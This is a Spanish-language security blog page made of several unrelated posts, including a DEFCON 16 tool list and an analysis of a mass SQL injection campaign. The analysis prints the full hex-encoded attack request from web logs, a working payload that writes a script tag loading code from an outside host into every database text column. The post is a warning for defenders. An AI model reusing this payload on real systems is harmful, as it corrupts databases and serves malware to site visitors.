Desde que Novell firmó un convenio con Microsoft se levantó en la red una sombra de dudas alimentada por saber el verdadero interés de Microsoft por ser aliado de Novell, muchas especulaciones se han dado pero lo que si es seguro, es que el dinero se ha movido y eso es lo que le interesa a los dos CEOs de estas grandes compañías.

Ahora después de varios meses de firmado el acuerdo de cooperación, Microsoft ha anunciado que el próximo 1 de noviembre pagará 100 millones de dólares a Novell por concepto de cuotas adicionales por suscripción esto quiere decir que los clientes de Microsoft están interesados en seguir adquiriendo los diferentes productos Open Source de Novell y además es mas dinero para seguir invirtiendo en el plan de integración de tecnologías que llevan a cabo estas compañías para beneficio de sus propios clientes.

De esta manera Novell sigue ganando (hasta ahora ha recibido 175 millones) y haciendo controversia por aceptar la cláusula del acuerdo que decía que ninguna parte demandaría a la otra o a sus clientes por cuestión de patentes, mostrando una posición contraria frente a la comunidad que siempre a visto el uso “comercial” de desarrollos que no se han hecho con fines comerciales.

Microsoft se ve comercialmente presionada por sus clientes para que sus productos sean tecnológicamente inter operables con soluciones de código abierto, su asociación con Novell les permite estar mas fuertes ante otras opciones del mercado.

Soy Cronopio y estaré escribiendo un poco para ustedes, espero tratar temas interesantes y estar actualizado.

Me considero un pequeño hacktivista del Software Libre perteneciente al grupo PULPA de la UTP. Desde hace unos años Debian se apodero de mi computador y mi cabeza, pienso cosas muy diferentes a todos pero estoy convencido que si piensas diferente entonces no estas solo.

Desde el primer congreso de seguridad en manizales en el 2004 ví que habian muchas personas como yo en este medio, interesados en aprender. Ahora muchos amigos que tengo son debido a eso y he aprendido junto a ellos y también de ellos. Espero seguir incursionando en este mundo y estaré abierto a cualquier comentario.

A continuacion les dejo un listado de herramientas de seguridad lanzadas en la reunión de hackers “DEFCON 16” en la Vegas

Beholder – by Nelson Murilo and Luis Eduardo
# Descripción: An open source wireless IDS program
# Pagina: http://www.beholderwireless.org/
# Correo: bh@beholderwireless.org

The Middler – by Jay Beale
# Descripción: The end-all be-all of MITM tools
# Pagina: http://www.themiddler.com/ (Online?)
# Preface Link: http://www.intelguardians.com/themiddler.html

ClientIPS – by Jay Beale
# Descripción: An open source inline “transparent” client-side IPS
# Pagina: http://www.ClientIPS.org/ (Online?)

Marathon Tool – by Daniel Kachakill
# Descripción: A Blind SQL Injection tool based on heavy queries
# Download Link: DEFCON 16 CD. No online link found.
# Correo: dani@kachakil.com

The Phantom Protocol – by Magnus Brading
# Descripción: A Tor-like protocol that fixes some of Tor’s major attack vectors
# Pagina: http://code.google.com/p/phantom
# Correo: brading@fortego.se

ModScan – by Mark Bristow
# Descripción: A SCADA Modbus Network Scanner
# Pagina: http://modscan.googlecode.com/
# Correo: mark.bristow@gmail.com

Grendel Scan – by David Byrne
# Descripción: Web Application scanner that searches for logic and design flaws as well as the standard flaw seen in the wild today (SQL Injection, XSS, CSRF)
# Pagina: http://grendel-scan.com/

iKat – interactive Kiosk Attack Tool (This site has an image as a banner that is definitely not safe for work! – You have been warned) by Paul Craig
# Descripción: A web site that is dedicated to helping you break out of Kiosk jails
# Pagina: http://ikat.ha.cked.net
# Correo: paul.craig@security-assessment.com

DAVIX – by Jan P. Monsch and Raffael Marty
# Descripción: A SLAX based Linux Distro that is geared toward data/log visualization
# Pagina: http://code.google.com/p/davix/
# Download Link: http://www.geekceo.com/davix/davix-0.5.0.iso.gz
# Correo: jan.monsch@iplosion.com and raffy@secviz.org

CollabREate – by Chris Eagle and Tim Vidas
# Descripción: An IDA Pro plugin with a server backend that allows multiple people to collaborate on a single RE (reverse engineering) project.
# Pagina: http://www.idabook.com/defcon
# Correo: cseagle@gmail.com and tvidas@gmail.com

Dradis – by John Fitzpatrick
# Descripción: A tool for organizing and sharing information during a penetration test
# Pagina: http://dradis.sourceforge.net
# Correo: john.fitzpatrick@mwrinfosecurity.com

Squirtle – by Kurt Grutzmacher
# Descripción: A Rouge Server with Controlling Desires that steals NTLM hashes.
# Pagina: http://code.google.com/p/squirtle (Live?)
# Correo: grutz@jingojango.net

WhiteSpace – by Kolisar
# Descripción: A script that can hide other scripts such as CSRF and iframes in spaces and tabs
# Download Link: DEFCON 16 CD

VoIPer – by nnp
# Descripción: VoIP automated fuzzing tool with support for a large number of VoIP applications and protocols
# Pagina: http://voiper.sourceforge.net/

Barrier – by Errata Security
# Descripción: A browser plugin that pen-tests every site that you visit.
# Pagina: http://www.erratasec.com
# Correo: sales@erratasec.com

Psyche – by Ponte Technologies
# Descripción: An advanced network flow visualization tool that is not soley based on time.
# Pagina: http://psyche.pontetec.com/

Escrito por AR-TECH en Herramientas de seguridad lanzada en DefCon 16 en las Vegas

Allí fue cuando  salió La Ezine DragonJAR #1, esta,  tuvo mucha acogida en toda la red, y fue descargada más de 3300 veces, obviamente tenía errores por que era nuestro primer paso en el mundo de las revistas electrónicas.

Despues de este “éxito” por decirlo así, muchos usuarios de la comunidad, e incluso los admin, se  unieron a este bonito proyecto, y  como había tanto material se hizo un concurso para que personas expertas calificaran los artículos más valiosos y estos serían premiados con una USB. Después de esto sale  este número de la revista, con un poco más de seriedad, y con contenidos filtrados por personas expertas, que se podía decir  de forma clara que eran los mejores artículos  de nuestra comunidad. Este número también se ha bajado mas de 1000 veces,  en muy poco tiempo.

Ahora es nuestro derecho sacar la mejor  revista digital de nuestra comunidad, por varias razones. La primera es para demostrar que nuestra comunidad no ha muerto, por el contrario ha surgido con mucha más fuerza. La segunda es  por que ya estamos organizados y tenemos un excelente grupo de trabajo. La tercera es por que  se corregirán todos los errores de números anteriores.

Es por estas razones y muchas más que quiero INVITAR A TODOS LOS USUARIOS DE LA COMUNIDAD DRAGONJAR a que se unan  a este grandioso proyecto escribiendo sus artículos y  que compartan todos sus conocimientos. Como todos saben la comunidad se enfoca hacia la seguridad informática, es por esto  que los artículos deben ser de este tipo, algo muy importante es que deben ser artículos propios, ya que debemos ser auténticos. Se recojeran articulos hasta el día 20 de septiembre y cualquier usuario puede participar, pueden enviar  los  articulos al correo epsilon77@gmail.com allí los leeremos y los editaremos.

Espero que  mucha gente nos apoye y mande su artículo, este debe ser en formato texto y  si trae imágenes estas deben ser anexadas. Necesitamos calidad y conocimiento y  estoy seguro que eso sobra en nuestra comunidad.

Gracias por la atención
saludos

Att:Epsilon
Director Ezine Comunidad DragonJAR
epsilon77@gmail.com
www.epsilonblog.net

Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.

Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.

La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.

Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.

Los requests que saldrían en los logs del web server se asemejan al siguiente:

GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0×4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).

Todos salimos muy contentos, y ninguno quería volver a casa, y es que todos los días había un programa al cual estamos cordialmente invitados.

Ya se ha habilitado un post en el foro, para comentar y publicar recursos relacionados con este evento. Así que bienvenidos a participar.

Ingresar al Post con el registro fotográfico del evento

ZoneAlarm, empresa bien conocida por su Firewall, ha permitido la descarga gratis de su software ForceField, una aplicación que permite aislar el navegador del resto del ordenador, de forma que las acciones de este no afecten a nuestro sistema, cuando cerremos el navegador desaparecen los archivos temporales, descargas, historial, además se añade un antispyware y tecnología antiphishing.

SOLO POR HOY 12 DE AGOSTO ES POSIBLE DESCARGAR ESTE SOFTWARE TOTALMENTE GRATIS CON UNA LICENCIA DE 1 AÑO

Das click en el botón , pones tus datos y a tu correo te llegara un enlace de descarga y la licencia correspondiente por 1 año, si quieres el software en español puedes bajarlo de aquí y utilizar el serial que te enviaron.

Gracias a GeeKFouR en el foro por el dato.

Gracias por su comprensión…

Las bajas que producen las guerras por lo general son escondidas de la prensa y los medios de manera muy celosa, pero eso quedo en el pasado gracias a la corporación iRobot con su soldado Packbot.

Los robots en el campo militar ya no son cuentos de ciencia ficción. Estos han dejado las pantallas de los cines y han entrado a un verdadero campo de batalla. Doug Few y Bill Smart (buen apellido) de la universidad de St. Louis, Washington, trabajan con tecnología de punta en cuanto a robotica se refiere. Few y Smart dicen que uno de los objetivos de los militares es tener su armada compuesta de al menos un 30% de robots para el 2020. Obviamente, por ahora, no se esta visionando robots como los vemos en la guerra de las galaxias, “yo, robot” o terminator.

Cuando se habla de robots, se refieren a todo desde camiones que se conducen solos hasta donde nosotros conocemos convencionalmente como robots. La mejor palabra para describirlo serian “sistemas autónomos” en vez de robots, afirma el asistente del profesor Smart (un profesor de ciencias de la computación e ingeniería).

Toda la fuerza de robots de la armada es teleoperada, lo cual significa que existe una persona real operando el robot desde una locación remota utilizando un joystick y un computador. Esto puede ser visto como una desventaja en la adición de robots a las fuerzas armadas, es muy importante mantener humanos que estén involucrados en las operaciones que realiza el robot.

“Es cuestión de seguir la linea de comando. No querrás darle autonomía a un sistema armado. En vez de eso, querrás tener un humano que oprima el botón.”, dice Smart, argumentando lo importante que es tener a un humano tomando todas las decisiones importantes.

Por ahora no tenemos problemas con los robots, de hecho muchos ya los estamos esperando. Sin embargo, existe el miedo argumentado de la verdadera utilidad de los robots en el campo de batalla. Si, seguramente podremos salvar muchas vidas, ¿pero a que costo?.

Estoy completamente seguro que el desarrollo de dichas tecnologías no parará ahí. Como es de costumbre en las personas, siempre vamos a evolucionar las tecnologías actuales que usamos en nuestra vida diaria, ¿y que mejor que evolucionar la tecnología que me permite acabar con mis enemigos?

Terminator no es una simple película, es un llamado a toda la humanidad a no depositar tanta confianza en los robots porque podríamos terminar asi. En lo personal, me agradaría vivir en un mundo lleno de robots que se encarguen de muchas cosas, siempre y cuando exista también la manera de reprogramar (contra atacar?). De cierta forma siento algo de satisfacción cuando veo que los temas polémicos que nos muestra el anime con respecto a la robotica y al futuro de la humanidad se vuelven cada día más tangibles

Los detalles de esta nueva arquitectura han sido lanzados por Intel en una conferencia sobre ‘Larrabee’ en la SIGGRAPH 2008. Los detalles incluyen un nuevo acercamiento de renderizacion de 3D basada en software, un modelo de programación de muchos núcleos y análisis de desempeño para bastantes aplicaciones.

El primer producto basado en Larrabee se enfocara al mercado de gráficos mediante computadores personales y se espera que salga en el 2009 o 2010. Larrabee sera la primera arquitectura “many-core” x86 de Intel en la industria, significando que sera basado en un arreglo de muchos procesadores. Los procesadores individuales son similar a los anteriores de Intel.

Se espera que Larrabee empiece a sacudir un poco a la industria, promoviendo esfuerzos para crear y optimizar el software para docenas, cientos y miles de núcleos que se espera que alimenten a los computadores en un futuro. Intel tiene algunos grupo de trabajo internos, proyectos y esfuerzos relacionados con software trabajando en paralelo para acelerar dicha transición, sin embargo las investigaciones de escalas a teras ha sido la inversión mas larga en las investigaciones en tecnología de Intel y se han hecho investigaciones en conjunto con más de 400 universidades, DARPA y otras compañías como Microsoft y HP para ayudar a mover la industria en esa dirección.

Con el tiempo, la consistencia de la arquitectura de Intel y por ende, la libertad que le ofrece a los desarrolladores otorgada por Larrabee, nos proveerán de una innovación masiva en muchas áreas y segmentos del mercado, asegura Intel. Por ejemplo, mientras los juegos actuales siguen evolucionando para ofrecernos más realismo, lo hacen con un framework de trabajo limitado y rígido. Trabajando directamente con algunos de los expertos mundiales en gráficos 3D, Larrabee les dará a los desarrolladores de juegos y de APIs un espacio en blanco donde ellos pueden innovar como nunca antes visto.

Las primeras implementaciones de la arquitectura Larrabee estarán enfocadas a aplicaciones de gráficos discretas que soporten DirectX y OpenGL. Adicional mente, una nueva gama de aplicaciones paralelas de alto rendimiento incluyendo aplicaciones científicas y de ingeniería se beneficiaran del modelo de programación nativo de C/C++ que trae Larrabee.

Puedes leer las diferentes caracteristicas de Larrabee en el paper publicado por Intel en la ACM.